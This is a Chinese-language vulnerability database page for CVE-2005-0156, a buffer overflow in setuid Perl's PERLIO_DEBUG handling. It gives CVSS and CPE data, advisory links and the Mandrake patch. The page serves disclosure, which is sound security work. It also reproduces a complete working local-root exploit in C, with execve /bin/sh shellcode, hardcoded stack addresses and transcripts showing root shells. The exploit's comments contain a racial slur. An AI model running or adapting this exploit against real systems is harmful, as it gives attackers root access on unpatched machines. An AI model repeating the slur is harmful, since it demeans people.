CVE-2005-0156
CVSS2.1
发布时间 :2005-02-07 00:00:00
修订时间 :2016-10-17 23:08:04
NMCOEP    

[原文]Buffer overflow in the PerlIO implementation in Perl 5.8.0, when installed with setuid support (sperl), allows local users to execute arbitrary code by setting the PERLIO_DEBUG variable and executing a Perl script whose full pathname contains a long directory tree.


[CNNVD]Perl SuidPerl多个本地漏洞(CNNVD-200502-006)

        Perl是流行的跨平台编程语言。
        部分Perl脚本在处理PERLIO_DEBUG变量时存在问题,本地攻击者可以利用这个漏洞破坏系统文件或进行缓冲区溢出攻击。
        攻击者可以通过设置PERLIO_DEBUG环境变量和调用任意setuid-root perl脚本来覆盖任何文件,PERLIO_DEBUG指向的文件然后会被PERL调试消息所覆盖,这个问题不能精确控制文件内容,但可以破坏重要数据。
        另外如果PERLIO_DEBUG设置,调用带超长路径的setuid-perl脚本,可导致缓冲区溢出,精心构建提交数据可能以root用户权限执行任意指令。

- CVSS (基础分值)

CVSS分值: 2.1 [轻微(LOW)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: NONE [对系统可用性无影响]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/o:redhat:enterprise_linux:3.0::advanced_server
cpe:/o:trustix:secure_linux:1.5Trustix Secure Linux 1.5
cpe:/o:redhat:enterprise_linux:3.0::enterprise_server
cpe:/o:suse:suse_linux:9.0::x86_64
cpe:/o:trustix:secure_linux:2.2Trustix Secure Linux 2.2
cpe:/a:larry_wall:perl:5.8.4.2.3
cpe:/a:larry_wall:perl:5.8.4.5
cpe:/o:suse:suse_linux:8.0::i386
cpe:/o:trustix:secure_linux:2.1Trustix Secure Linux 2.1
cpe:/o:trustix:secure_linux:2.0Trustix Secure Linux 2.0
cpe:/o:redhat:fedora_core:core_3.0
cpe:/a:larry_wall:perl:5.8.4.1
cpe:/o:ibm:aix:5.2IBM AIX 5.2
cpe:/a:larry_wall:perl:5.8.4.2
cpe:/o:ubuntu:ubuntu_linux:4.1::ia64
cpe:/a:larry_wall:perl:5.8.4.3
cpe:/a:larry_wall:perl:5.8.4.4
cpe:/o:ibm:aix:5.3IBM AIX 5.3
cpe:/o:redhat:enterprise_linux:3.0::workstation_server
cpe:/a:sgi:propack:3.0SGI ProPack 3.0
cpe:/o:redhat:enterprise_linux_desktop:3.0Red Hat Desktop 3.0
cpe:/a:larry_wall:perl:5.8.4
cpe:/a:larry_wall:perl:5.8.3
cpe:/a:larry_wall:perl:5.8.0
cpe:/a:larry_wall:perl:5.8.1
cpe:/o:ubuntu:ubuntu_linux:4.1::ppc
cpe:/o:suse:suse_linux:8.1SuSE SuSE Linux 8.1
cpe:/o:suse:suse_linux:9.0SuSE SuSE Linux 9.0
cpe:/o:suse:suse_linux:8.0SuSE SuSE Linux 8.0
cpe:/o:suse:suse_linux:9.2SuSE SuSE Linux 9.2
cpe:/o:suse:suse_linux:8.2SuSE SuSE Linux 8.2
cpe:/o:suse:suse_linux:9.1SuSE SuSE Linux 9.1

- OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:10803Buffer overflow in the PerlIO implementation in Perl 5.8.0, when installed with setuid support (sperl), allows local users to execute arbitr...
*OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0156
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-0156
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200502-006
(官方数据源) CNNVD

- 其它链接及资源

http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=001056
(UNKNOWN)  CONECTIVA  CLSA-2006:1056
http://fedoranews.org/updates/FEDORA--.shtml
(UNKNOWN)  FEDORA  FLSA-2006:152845
http://marc.info/?l=bugtraq&m=110737149402683&w=2
(UNKNOWN)  BUGTRAQ  20050202 [USN-72-1] Perl vulnerabilities
http://marc.info/?l=full-disclosure&m=110779721503111&w=2
(UNKNOWN)  FULLDISC  20050207 DMA[2005-0131b] - 'Setuid Perl PERLIO_DEBUG
http://www.digitalmunition.com/DMA%5B2005-0131b%5D.txt
(UNKNOWN)  MISC  http://www.digitalmunition.com/DMA[2005-0131b].txt
http://www.gentoo.org/security/en/glsa/glsa-200502-13.xml
(VENDOR_ADVISORY)  GENTOO  GLSA-200502-13
http://www.mandriva.com/security/advisories?name=MDKSA-2005:031
(UNKNOWN)  MANDRAKE  MDKSA-2005:031
http://www.redhat.com/support/errata/RHSA-2005-103.html
(VENDOR_ADVISORY)  REDHAT  RHSA-2005:103
http://www.redhat.com/support/errata/RHSA-2005-105.html
(VENDOR_ADVISORY)  REDHAT  RHSA-2005:105
http://www.securityfocus.com/bid/12426
(VENDOR_ADVISORY)  BID  12426
http://www.trustix.org/errata/2005/0003/
(VENDOR_ADVISORY)  TRUSTIX  2005-0003
http://xforce.iss.net/xforce/xfdb/19208
(VENDOR_ADVISORY)  XF  perl-perliodebug-bo(19208)

- 漏洞信息

Perl SuidPerl多个本地漏洞
低危 缓冲区溢出
2005-02-07 00:00:00 2005-10-20 00:00:00
本地  
        Perl是流行的跨平台编程语言。
        部分Perl脚本在处理PERLIO_DEBUG变量时存在问题,本地攻击者可以利用这个漏洞破坏系统文件或进行缓冲区溢出攻击。
        攻击者可以通过设置PERLIO_DEBUG环境变量和调用任意setuid-root perl脚本来覆盖任何文件,PERLIO_DEBUG指向的文件然后会被PERL调试消息所覆盖,这个问题不能精确控制文件内容,但可以破坏重要数据。
        另外如果PERLIO_DEBUG设置,调用带超长路径的setuid-perl脚本,可导致缓冲区溢出,精心构建提交数据可能以root用户权限执行任意指令。

- 公告与补丁

        目前厂商已经发布了升级补丁以修复这个安全问题,补丁下载链接:
        http://lwn.net/Alerts/122393/?format=printable
        http://lwn.net/Alerts/195043
        http://lwn.net/Alerts/123652/?format=printable
        http://security.gentoo.org/glsa/glsa-200502-13.xml

- 漏洞信息 (791)

Setuid perl PerlIO_Debug() overflow (EDBID:791)
linux local
2005-02-07 Verified
0 Kevin Finisterre
N/A [点击下载]
/*
 * Copyright Kevin Finisterre
 *
 * Setuid perl PerlIO_Debug() overflow
 *
 * Tested on Debian 3.1 perl-suid 5.8.4-5 
 *
 * (11:07:20) *corezion:* who is tha man with tha masta plan?
 * (11:07:36) *corezion:* a nigga with a buffer overrun
 * (11:07:39) *corezion:* heh
 * (of course that is to the tune of http://www.azlyrics.com/lyrics/drdre/niggawittagun.html)
 *
 * cc -o ex_perl2 ex_perl2.c -std=c99
 * 
 * kfinisterre@jdam:~$ ./ex_perl2
 * Dirlen: 1052
 * Charlie Murphy!!!@#@
 * sh-2.05b# id
 * uid=1000(kfinisterre) gid=1000(kfinisterre) euid=0(root) 
 * 
 */

#include <stdlib.h>
#include <stdio.h>
#include <strings.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

int main(int *argc, char **argv)
{
	int len = 23;
 	int count = 5;
	char malpath[10000];
	char tmp[256];
	char *filler;
	char *ptr;

	unsigned char code[] = 
	/*
	  0xff-less execve() /bin/sh by anathema <anathema@hack.co.za>
	  Linux/IA32 0xff-less execve() shellcode.  
	 */
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"

        // setuid(0) - fix for redhat based machines
	"\x31\xdb"                      // xorl         %ebx,%ebx
	"\x8d\x43\x17"                  // leal         0x17(%ebx),%eax
	"\xcd\x80"                      // int          $0x80

	"\x89\xe6"                          /* movl %esp, %esi          */
	"\x83\xc6\x30"                      /* addl $0x30, %esi         */
	"\xb8\x2e\x62\x69\x6e"              /* movl $0x6e69622e, %eax   */
	"\x40"                              /* incl %eax                */
	"\x89\x06"                          /* movl %eax, (%esi)        */
	"\xb8\x2e\x73\x68\x21"              /* movl $0x2168732e, %eax   */
	"\x40"                              /* incl %eax                */
	"\x89\x46\x04"                      /* movl %eax, 0x04(%esi)    */
	"\x29\xc0"                          /* subl %eax, %eax          */
	"\x88\x46\x07"                      /* movb %al, 0x07(%esi)     */
	"\x89\x76\x08"                      /* movl %esi, 0x08(%esi)    */
	"\x89\x46\x0c"                      /* movl %eax, 0x0c(%esi)    */
	"\xb0\x0b"                          /* movb $0x0b, %al          */
	"\x87\xf3"                          /* xchgl %esi, %ebx         */
	"\x8d\x4b\x08"                      /* leal 0x08(%ebx), %ecx    */
	"\x8d\x53\x0c"                      /* leal 0x0c(%ebx), %edx    */
	"\xcd\x80"                          /* int $0x80                */;


	chdir("/tmp/");

	// do one less char than usual for RedHat 
	filler = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/";
	
	for (int x=0; x<4; x=x+1)
	{
		mkdir(filler, 0777);
		chdir(filler);
		// do one less char than usual for RedHat 
		count = count + 255;		
	}

        memset(tmp,0x41,len);  
	count = count + len;

        ptr = tmp+len;
        ptr = putLong (ptr, 0xbffffb6a); // frame 11 ebp
        ptr = putLong (ptr, 0xbffffb6a); 
        ptr = putLong (ptr, 0xbffffb6a);

	strcat(tmp, "/");
	mkdir(tmp, 0777);
	chdir(tmp);

	printf ("Dirlen: %d\n", count); 

	FILE *perlsploit;
	char perldummyfile[] = {
                "#!/usr/bin/sperl5.8.4\n"
                "# \n"
                "# Be proud that perl(1) may proclaim: \n"
                "#   Setuid Perl scripts are safer than C programs ...\n"
                "# Do not abandon (deprecate) suidperl. Do not advocate C wrappers. \n"
        };

        if(!(perlsploit = fopen("take_me.pl","w+"))) {
                printf("error opening file\n");
                exit(1);
        }
        fwrite(perldummyfile,sizeof(perldummyfile)-1,1,perlsploit);
        fclose(perlsploit);

	getcwd(malpath, 10000);
	strcat(malpath, "/");
	strcat(malpath, "take_me.pl");
	printf("Charlie Murphy!!!@#@\n");

	chmod(malpath,0755);
        setenv("PERLIO_DEBUG", "/tmp/ninjitsu", 1);
	setenv("PERL5LIB", code, 1);
	execv(malpath,(char *) NULL);

}
/*
 * put a address in mem, for little-endian
 *
 */
char*
putLong (char* ptr, long value)
{
    *ptr++ = (char) (value >> 0) & 0xff;
    *ptr++ = (char) (value >> 8) & 0xff;
    *ptr++ = (char) (value >> 16) & 0xff;
    *ptr++ = (char) (value >> 24) & 0xff;

    return ptr;
}

// milw0rm.com [2005-02-07]
		

- 漏洞信息 (F36092)

ex_perl2b.c (PacketStormID:F36092)
2005-02-22 00:00:00
Kevin Finisterre  digitalmunition.com
exploit,overflow,local,root
CVE-2005-0156
[点击下载]

Local root exploit for the PerlIO package that makes use of a buffer overflow in PERLIO_DEBUG.

- 漏洞信息 (F36091)

DMA-2005-0131b.txt (PacketStormID:F36091)
2005-02-22 00:00:00
Kevin Finisterre  digitalmunition.com
advisory,overflow,local,root,perl
CVE-2005-0156
[点击下载]

The PerlIO package for Perl 5.8.0 suffers from a flaw where PERLIO_DEBUG is susceptible to a buffer overflow that allows for local root compromise when using setuid perl.

DMA[2005-0131b] - 'Setuid Perl PERLIO_DEBUG buffer overflow'
Author: Kevin Finisterre
Vendor: http://dev.perl.org/
Product: 'Perl 5.8.x - sperl'
References: (CAN-2005-0156)
http://www.digitalmunition.com/DMA[2005-0131b].txt
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-0156
https://rt.perl.org/rt3/Ticket/Display.html?id=33990 (guest/guest)
http://www.mail-archive.com/perl5-changes@perl.org/msg10733.html
http://www.mail-archive.com/perl5-changes@perl.org/msg10734.html
http://www.mail-archive.com/perl5-changes@perl.org/msg10736.html
http://www.mail-archive.com/perl5-changes@perl.org/msg10737.html

Description: 
Perl is a stable, cross platform programming language. It is used for mission critical projects 
in the public and private sectors and is widely used to program web applications of all needs.

In the July 18, 2002 highlights for Perl 5.8.0 there was a 'New IO Implementation' added called
PerlIO. The new PerlIO implementation was described as both a portable stdio implementation
(at the source code level) and a flexible new framework for richer I/O behaviours. 

As an attacker I would definately say that PerlIO has some rich behavior. Two vulnerabilities 
were located in the PerlIO package that can allow an attacker to take root on a machine that 
makes use of setuid perl aka sperl. The first vulnerability was outlined in DMA[2005-0131a], 
details on the second vulnerability will be explained below.

Perl provides debug access to PerlIO via an environment variable known as PERLIO_DEBUG. The perl
documentaion tells us that if PERLIO_DEBUG is set to the name of a file or device then certain 
operations of PerlIO sub-system will be logged to that file in append mode. When the data is 
logged to the file specified by PERLIO_DEBUG the path of the perl script is also logged. If perl
is called all by itself the path should show up as "-". If however the a perl script is run, its 
full path then the entire path will be logged. The following sample run demonstrates the logging 
functionality. 

kfinisterre@kfinisterre01:/tmp$ cat > test.pl
#!/usr/bin/sperl5.8.4
print "test\n";
^C
kfinisterre@kfinisterre01:/tmp$ chmod +x test.pl
kfinisterre@kfinisterre01:/tmp$ export PERLIO_DEBUG=/tmp/test
kfinisterre@kfinisterre01:/tmp$ ./test.pl
sperl needs fd script
You should not call sperl directly; do you need to change a #! line
from sperl to perl?
kfinisterre@kfinisterre01:/tmp$ cat /tmp/test
./test.pl:0 define unix 0x4013a5e0
./test.pl:0 define raw 0x4013a560
./test.pl:0 define perlio 0x4013a6e0
./test.pl:0 define stdio 0x4013a660
./test.pl:0 define crlf 0x4013a7e0
./test.pl:0 define mmap 0x4013a860
./test.pl:0 define utf8 0x4013a460
./test.pl:0 define pop 0x4013a3e0
./test.pl:0 define bytes 0x4013a4e0
./test.pl:0 unix => 0x4013a5e0
./test.pl:0 Pushing perlio
./test.pl:0 perlio => 0x4013a6e0
./test.pl:0 Layer 1 is perlio
./test.pl:0 openn(perlio,'(null)','Ir',0,0,0,(nil),0,(nil))
...

The function responsible for logging the PerlIO data contains an unbounded call to sprintf()
as you can see below. 

in perlio.c:

   if (dbg > 0) {
        dTHX;
#ifdef USE_ITHREADS
        /* Use fixed buffer as sv_catpvf etc. needs SVs */
        char buffer[1024];
        char *s;
        STRLEN len;
        s = CopFILE(PL_curcop);
        if (!s)
            s = "(none)";
        sprintf(buffer, "%s:%" IVdf " ", s, (IV) CopLINE(PL_curcop));

We can trigger this vulnerability by placing a perl script in a very long directory tree and 
simply executing it after we have defined PERLIO_DEBUG. ex_perl2.c simulates this behavior. 

kfinisterre@kfinisterre01:~$ cc -o ex_perl2 ex_perl2.c -std=c99
ex_perl2.c: In function `main':
ex_perl2.c:67: warning: implicit declaration of function `putenv'
kfinisterre@kfinisterre01:~$ ltrace -f ./ex_perl2
__libc_start_main(0x8048654, 1, 0xbffff944, 0x8048860, 0x80488c0 <unfinished ...>
chdir("/tmp/")     
mkdir("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"..., 0777) 
chdir("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"...)     
mkdir("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"..., 0777)
chdir("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"...) 
mkdir("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"..., 0777) 
chdir("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"...)
memset(0xbfffd0c0, 'B', 201) 
strcat("BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB"..., "/")  
mkdir("BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB"..., 0777)
chdir("BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB"...)
printf("Dirlen: %d\n", 974Dirlen: 974)
fopen("take_me.pl", "w+")  
fwrite("#!/usr/bin/sperl5.8.4\n# \n# Be pr"..., 186, 1, 0x8049d70)   
fclose(0x8049d70)
getcwd(0xbfffd1c0, 10000)
strcat("/tmp/AAAAAAAAAAAAAAAAAAAAAAAAAAA"..., "/")
strcat("/tmp/AAAAAAAAAAAAAAAAAAAAAAAAAAA"..., "take_me.pl")
printf("running: %s\n", "/tmp/AAAAAAAAAAAAAAAAAAAAAAAAAAA"...) 
chmod("/tmp/AAAAAAAAAAAAAAAAAAAAAAAAAAA"..., 0755)  
putenv(0x8048bca, 493, 1, 0x8049d70, 0x752f2123)
system("/tmp/AAAAAAAAAAAAAAAAAAAAAAAAAAA"... <unfinished ...>
...
Perl_croak(0x8057b68, 0x8056480, 0, 0, 1 <unfinished ...>
--- SIGSEGV (Segmentation fault) ---
+++ killed by SIGSEGV +++


This vulnerability could be exploited to gain root privileges on the machine in question.
kfinisterre@kfinisterre01:~$ ./ex_perl2a
Dirlen: 1048
Charlie Murphy!!!@#@
sh-2.05b# id
uid=0(root) gid=1000(kfinisterre) groups=1000(kfinisterre)

The following patch for this bug was provided by Mandrake care of the vendor-sec list. This patch 
also fixes the bug that is described in DMA[2005-0131a].

Index: perlio.c
===================================================================
--- perlio.c    (revision 4342)
+++ perlio.c    (revision 4346)
@@ -454,7 +454,7 @@
     va_list ap;
     dSYS;
     va_start(ap, fmt);
-    if (!dbg) {
+    if (!dbg && !PL_tainting && PL_uid == PL_euid && PL_gid == PL_egid) {
        char *s = PerlEnv_getenv("PERLIO_DEBUG");
        if (s && *s)
            dbg = PerlLIO_open3(s, O_WRONLY | O_CREAT | O_APPEND, 0666);
@@ -471,7 +471,7 @@
        s = CopFILE(PL_curcop);
        if (!s)
            s = "(none)";
-       sprintf(buffer, "%s:%" IVdf " ", s, (IV) CopLINE(PL_curcop));
+       sprintf(buffer, "%.40s:%" IVdf " ", s, (IV) CopLINE(PL_curcop));
        len = strlen(buffer);
        vsprintf(buffer+len, fmt, ap);
        PerlLIO_write(dbg, buffer, strlen(buffer));

This bug has been successfully exploited on:
Debian 3.1
Ubuntu 4.10
Redhat 8.0

This is timeline associated with this bug. 

01/30/2005 09:29 AM - Mail to larry wall, perlbug, vendor-sec et all 
01/31/2005 04:25 AM - Rafael Garcia-Suarez disabed PERLIO_DEBUG in sperl
01/31/2005 08:31 AM - perl #33990] [RESOLVED] 
01/31/2005 11:15 AM - perl-5.8.6-bug33990.patch passed on from Mandrake cvs
02/02/2005 05:20 PM - Alternate patch provided nick@ccl4.org

-KF


    

- 漏洞信息

13452
Perl PERLIO_DEBUG Local Overflow
Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

Unknown or Incomplete

- 时间线

2005-02-02 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站